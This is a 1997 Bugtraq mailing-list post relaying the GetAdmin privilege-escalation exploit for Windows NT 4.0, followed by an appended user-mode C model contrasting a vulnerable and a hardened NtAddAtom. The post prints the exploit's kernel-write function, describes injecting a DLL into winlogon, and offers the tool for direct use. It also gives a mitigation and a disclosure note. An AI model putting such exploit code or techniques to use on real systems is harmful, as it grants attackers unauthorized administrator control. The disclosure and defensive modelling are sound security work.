Bugtraq mailing list archives
GetAdmin NT exploit
From: cklaus () ISS NET (Christopher Klaus)
Date: Tue, 8 Jul 1997 11:19:00 -0400
Windows NT 4.0 Exploit: Allows intruders to become administrators on a machine. Works on Windows NT 4.0 with Service Pack 3 installed.

Web: http://cmp.phys.msu.su/ntclub/pub/code.htm

GetAdmin source code.

Here's my program GetAdmin. This program can get administrator rights without any special privileges. Simply run GetAdmin or GetAdmin account_name from the command line. If you do not enter account_name, the current account will be used.

How does it work? Here's the line that does it all in getadmin:

    ChangeNtGlobalFlag(GetNtGlobalFlagPtr());

After that you can open any process in the system, because the function NtOpenProcess does not check for SE_DEBUG_PRIVILEGE if a bit in NtGlobalFlag+2 is set. After that, the program injects a DLL into the winlogon process. Winlogon has the SYSTEM account, so it can add/remove a user in the administrator group.

Function ChangeNtGlobalFlag:

    #include <windows.h>
    #include <stdio.h>

    BOOL ChangeNtGlobalFlag(DWORD pNtGlobalFlag)
    {
        DWORD callnumber = 0x3;   // system service number of NtAddAtom on NT 4.0
        DWORD stack[32];          // argument block handed to the system call
        int i;
        DWORD handle = 0;         // receives the atom until the wanted value shows up
        CHAR string[255];

        if (!pNtGlobalFlag) return 0;

        stack[0] = (DWORD)string;    // atom name
        stack[1] = (DWORD)&handle;   // output pointer; later swapped for pNtGlobalFlag+1

        for (i = 0; i < 0x100; i++)
        {
            sprintf(string, "NT now cracking... pass %d", i);
            // once the returned atom has bits set in 0xf00, aim the unchecked
            // output pointer at NtGlobalFlag+1 so the next atom lands in kernel memory
            if (handle & 0xf00) {
                stack[1] = (DWORD)pNtGlobalFlag + 1;
            }
            __asm {
                mov eax, callnumber;          // service number in eax
                mov edx, stack;
                lea edx, dword ptr [stack];   // edx = address of the argument block
                int 0x2e;                     // NT 4.0 system call interrupt
            }
            if (stack[1] == pNtGlobalFlag + 1) break;
        }
        return TRUE;
    }

The bug is that a subfunction in NtAddAtom does not check the address of the output. So it is possible to write to any place in kernel memory. Of course it is not necessary to inject a DLL into winlogon; to get admin rights you can simply patch the same place in ntoskrnl, or replace the process token, etc. If you want to get the full source code, please click here.

Preventing the Attack: There is only one real way: patch ntoskrnl and replace the function NtAddAtom so that it checks for a valid address. You can remove all access from ntoskrnl, but it is possible to enter a fixed address of NtGlobalFlag in getadmin. And other ways exist to get administrator rights if you can write to kernel memory.

I informed Microsoft about this on 30 Jun 97. Konstantin Sobolev.
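The bug class Sobolev describes, a system call that writes its result through a caller-supplied pointer without checking that the pointer lies in user memory, and the fix he proposes (make NtAddAtom check the address) can be modelled in user-mode C. The following is an added example, not part of the original post or of GetAdmin: it replays the ChangeNtGlobalFlag loop against two toy models of NtAddAtom, one that trusts the output pointer and one that probes it the way the kernel should. The address layout, the NtGlobalFlag address 0x140, the atom start value 0xC0FE and the user/kernel boundary are constructed for the model; the real NT 4.0 layout and atom numbering are not reproduced.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Toy address space (constructed; not the NT 4.0 layout):
 * addresses below USER_LIMIT are "user" memory, the rest is "kernel" memory. */
#define MEM_SIZE            0x200u
#define USER_LIMIT          0x100u
#define NT_GLOBAL_FLAG_ADDR 0x140u   /* hypothetical kernel address of NtGlobalFlag */

typedef uint32_t nt_status;
#define STATUS_SUCCESS          0x00000000u
#define STATUS_ACCESS_VIOLATION 0xC0000005u

static uint8_t  mem[MEM_SIZE];
static uint16_t next_atom;

static void reset_model(void)
{
    memset(mem, 0, sizeof mem);
    next_atom = 0xC0FE;   /* constructed start value so the loop redirects after a few passes */
}

static uint32_t read_flag(void)
{
    uint32_t v;
    memcpy(&v, &mem[NT_GLOBAL_FLAG_ADDR], sizeof v);
    return v;
}

/* Vulnerable model of the NtAddAtom path the post describes: the caller-supplied
 * output pointer is used without validation, so the 16-bit atom is written
 * wherever the caller points, kernel memory included. */
nt_status add_atom_unchecked(const char *name, uint32_t out_ptr)
{
    (void)name;
    if (out_ptr > MEM_SIZE - sizeof(uint16_t))
        return STATUS_ACCESS_VIOLATION;   /* only keeps the toy array in bounds */
    uint16_t atom = next_atom++;
    memcpy(&mem[out_ptr], &atom, sizeof atom);
    return STATUS_SUCCESS;
}

/* Hardened model: probe the output range first (the ProbeForWrite idea) and
 * refuse anything that is not entirely inside user memory or that wraps around. */
nt_status add_atom_checked(const char *name, uint32_t out_ptr)
{
    uint32_t end = out_ptr + sizeof(uint16_t);
    if (end < out_ptr || end > USER_LIMIT)
        return STATUS_ACCESS_VIOLATION;
    return add_atom_unchecked(name, out_ptr);
}

/* Replays the ChangeNtGlobalFlag loop against a given syscall model. Returns 1 if
 * the "kernel" NtGlobalFlag was modified, 0 if the write was refused. */
int replay_getadmin(nt_status (*add_atom)(const char *, uint32_t))
{
    const uint32_t handle_addr = 0x40;   /* user buffer that normally receives the atom */
    uint32_t out_ptr = handle_addr;
    char name[64];
    int i;

    reset_model();
    uint32_t before = read_flag();

    for (i = 0; i < 0x100; i++) {
        uint16_t handle;
        snprintf(name, sizeof name, "NT now cracking... pass %d", i);
        memcpy(&handle, &mem[handle_addr], sizeof handle);
        /* once the atom value has bits in 0xf00, redirect the output into kernel memory */
        if (handle & 0xf00)
            out_ptr = NT_GLOBAL_FLAG_ADDR + 1;
        if (add_atom(name, out_ptr) != STATUS_SUCCESS)
            return 0;                     /* the probing kernel rejects the kernel-range write */
        if (out_ptr == NT_GLOBAL_FLAG_ADDR + 1)
            break;
    }
    return read_flag() != before;
}

int main(void)
{
    printf("unchecked NtAddAtom model: flag modified = %d\n", replay_getadmin(add_atom_unchecked));
    printf("checked   NtAddAtom model: flag modified = %d\n", replay_getadmin(add_atom_checked));
    return 0;
}
```

The only difference between the two models is the range check before the write; with it in place the same GetAdmin loop runs its first passes normally (the output buffer is in user memory) and is stopped at the exact pass where it redirects the pointer into the kernel.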